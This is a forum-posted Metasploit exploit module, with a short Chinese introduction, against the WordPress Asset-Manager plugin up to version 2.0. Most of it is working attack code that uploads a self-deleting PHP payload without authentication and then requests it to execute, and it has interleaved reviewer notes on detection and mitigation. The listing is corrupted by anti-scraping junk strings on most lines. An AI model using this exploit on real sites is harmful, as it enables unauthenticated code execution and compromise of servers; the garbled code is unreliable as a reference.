
WordPress Asset-Manager PHP文件上传漏洞

这个模块利用的是 Metasploit 漏洞利用库中针对 WordPress Asset-Manager 插件 2.0 及以下版本的漏洞。该漏洞允许上传 PHP 文件:用户无需身份验证即可将文件上传到一个临时目录,从而导致执行任意代码。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

: y* M; C2 r' L0 K- Vrequire 'msf/core'  ~- X" E" D( D8 Q0 u6 O" i
require 'msf/core/exploit/php_exe'
* t0 V& t  Y4 Z, Y) A9 t' Q$ D
# Metasploit module as posted on this forum page: WordPress Asset-Manager <= 2.0.
# The plugin's upload.php accepts a multipart "Filedata" file part with no
# authentication, so an unauthenticated POST can drop a .php file into
# wp-content/uploads/assets/temp/ and a plain GET of that path executes it.
# Defender notes (derived from the two requests this module sends):
#   - Detection: a POST to .../plugins/asset-manager/upload.php followed by a GET of
#     a short random-named .php under .../uploads/assets/temp/ from the same client.
#   - Mitigation (reviewer recommendation): remove or upgrade the plugin and deny PHP
#     execution under wp-content/uploads.
# NOTE(review): this listing is interleaved with anti-scraping noise (e.g. "7 O6 l/ Z"),
# so it is not runnable as shown. The mixin on the garbled include below is presumably
# Msf::Exploit::PhpEXE (cf. require 'msf/core/exploit/php_exe'), which would be the
# provider of get_write_exec_payload -- confirm against the upstream module.
* `( O8 @/ n0 Y8 xclass Metasploit3 < Msf::Exploit::Remote7 O6 l/ Z# P* Y$ z( o) S
  Rank = ExcellentRanking9 ^: b& ~! e; L( C+ }! a
; E$ T6 ?# N% O+ g' g+ c
  include Msf::Exploit::Remote::HttpClient2 O( l6 J1 V# Q  Y
  include Msf::Exploit:hpEXE
8 F3 m) b1 S" v! Z# L
  # Module metadata (name, description, references, payload/target table) plus the
  # single TARGETURI option. DisclosureDate and the EDB/OSVDB/BID references are as
  # given in the listing.
. y  E2 s7 {5 Q3 ], o  Y  def initialize(info = {})
* p8 e5 c7 }  L8 X: R    super(update_info(info,9 ?, d. v0 o2 r* {0 _7 H
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',' [) o! D9 m, ]9 i% n5 t2 o! r2 E
      'Description'    => %q{1 h: \# @* h8 _- N5 H9 H
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
7 V1 W( N# G7 ~7 {* u        plugin.  By abusing the upload.php file, a malicious user can upload a file to a$ ]8 Z/ {4 e! a
        temp directory without authentication, which results in arbitrary code execution.: Q: o9 Q+ e" G$ L; P0 f6 T  d
      },$ D  @5 P6 k& ]8 ?
      'Author'         =>
  _5 Z0 ~, ~& N: \+ [        [
9 L+ x. g5 z8 d9 ]6 \          'Sammy FORGIT', # initial discovery
' ^2 I- Z3 C% ]; v! m          'James Fitts <fitts.james[at]gmail.com>' # metasploit module" ?0 A& p4 s! y+ [) D' \! r! F
        ],$ Q' A$ H  O, y
      'License'        => MSF_LICENSE,' I0 @% v* x# y3 ]3 U
      'References'     =>' J& x) g2 @" k7 d
        [
! {& u. G* U8 N2 D/ W! F          [ 'OSVDB', '82653' ],
1 t& ]  u/ a) G- K+ j+ b0 ]          [ 'BID', '53809' ],
! l- |$ o) E! W          [ 'EDB', '18993' ],
' b/ ]  d$ D; b! J          [ 'URL', 'http:// www.myhack58.com /' ]7 R; {5 I+ k8 Y* v1 }7 z
        ],
+ [3 K: N6 K# i; j; c      'Payload'       =>
2 D- M0 e1 _% J  g% E: V( I/ b        {
' {; j) e/ u8 u8 `7 t" c          'BadChars' => "\x00",' j# ^9 s" x, w
        },' J% y1 U+ R5 P) Z8 G( B$ j6 v' e0 K
      'Platform'       => 'php',
" Z: V0 w  J( w# f1 C      'Arch'           => ARCH_PHP,* A3 o: y+ f& s/ x8 V. ^9 Q' U4 s6 Q
      'Targets'        =>3 A+ y1 r7 s  P3 ~' r! _; x
        [
: Y: R6 a+ A2 I5 \$ f* E! }% B          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
0 M1 b( m0 b; t$ r. v, c          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]( G8 b8 j* G) g$ H: c0 |
        ],' _  G- ^) q! B1 ~
      'DefaultTarget' => 0,
, c7 e/ b3 V* i$ ?! W% M      'DisclosureDate' => 'May 26 2012'))
3 `  e, r0 H( a1 V8 x6 x ; q6 z' [2 `. X5 \! }2 b
    # Only option: TARGETURI, the WordPress base path (default '/wordpress').
    register_options(8 d7 @0 w0 d& p4 e8 v
      [' J# L: c$ i8 I, X* S' o  R
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' C5 n9 h: s& @: b$ C1 }      ], self.class)/ u) L5 d0 e9 M* i$ m2 ]
  end
( S. Q: v8 }: `  }3 M& d
  # Two-step chain: upload the PHP payload, then request it.
  # Calls fail_with(UnexpectedReply) when the upload response is missing, not 200,
  # or does not echo the uploaded filename; on the final GET only a non-200 reply
  # is treated as failure (a missing reply is accepted, see the check below).
" L7 D& G' e) g5 _$ M7 R  def exploit! H$ E* J0 j  i5 n9 @7 ]8 R, F) T/ t( \
    uri =  target_uri.path( J+ a1 {  w1 c- B. Q8 a( @" h
    # ensure a trailing slash so the plugin paths below concatenate cleanly
    uri << '/' if uri[-1,1] != '/'  B1 A) N/ e2 U5 h8 F( o4 p& A4 o
    peer = "#{rhost}:#{rport}"1 ]1 O) H8 \5 _2 W- s2 g
    # five random letters + ".php": the dropped file name (also printed in status output)
    payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self => true presumably makes the dropped file remove itself
    # after it runs -- confirm against the PhpEXE mixin. If so, the temp file may already
    # be gone when responders look; web-server access logs are the durable artefact.
$ T" t% \' V6 J7 H    php_payload = get_write_exec_payload(:unlink_self=>true)3 T/ f& i; X, V% ~  f( O

    # multipart body with a single part named "Filedata"; the gsub strips the CRLF
    # that precedes the first "--_Part_" boundary
) |& s' Q1 k. q# ^    data = Rex::MIME::Message.new% E( o  K+ `5 j. E# d) n
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""). N  t, Z! a7 I6 `' Z* ^! J
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'), M% |+ x. w; e" Q) J, O% L" F: }9 ^6 t, I

+ v' P, M- s: T    print_status("#{peer} - Uploading payload #{payload_name}")$ C4 N- W" i, v& m: z7 q8 T1 }
    # step 1: POST the file to the plugin's upload.php (no credentials are sent)
    res = send_request_cgi({
" b8 k9 N6 I* R  n% N' o      'method'  => 'POST',
* y: v* W$ |: ~9 P+ E- Q      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",* L! ?) o+ D' i  ~2 l! b9 \/ d
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",6 c$ Y5 W" m* `, e
      'data'    => post_data' }* @! |5 x% ~' e& ^) [
    })
1 U: _2 k! Z% x- o: S3 b
    # success = HTTP 200 and the response body echoes the uploaded filename
$ A8 j1 g- @% t' M8 ^$ u/ q    if not res or res.code != 200 or res.body !~ /#{payload_name}/9 v6 v2 R9 n8 }! R; }6 J/ G5 F
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")1 g/ A6 }  S6 o/ _) T* b+ T
    # closes the upload-failure guard above (the `end` lost its indentation in this listing)
end6 ?* R: N& S1 G7 x
+ o0 R4 n6 N7 u( y0 K" p5 Y
    print_status("#{peer} - Executing payload #{payload_name}")
    # step 2: GET the dropped file from the plugin's temp directory, which runs it
, n  J$ U: Q4 Y" o( g4 h    res = send_request_raw({
' F9 k! n# a9 T* d" K/ d1 T& e      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",5 _% b4 m1 z; B5 S/ R- u
      'method'  => 'GET'
/ C9 y% x% N3 u& `9 P1 `    })
) e# h% W  G4 O# c" p. K 6 e( p4 Y( a+ @: K# N
    # only a non-200 reply is an error here; no reply at all (res nil) passes,
    # presumably because a payload that takes over the request may never answer
    if res and res.code != 200
8 m% W; O* s+ W2 _6 Z      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% V/ V7 A: ?' e6 T7 G$ P
    end6 y0 i% B7 C+ d( ~/ [8 x7 v
  end+ S! n4 G; ^7 L6 l3 A
end% ]. F# p) d, V( Y3 i  W' J5 h0 d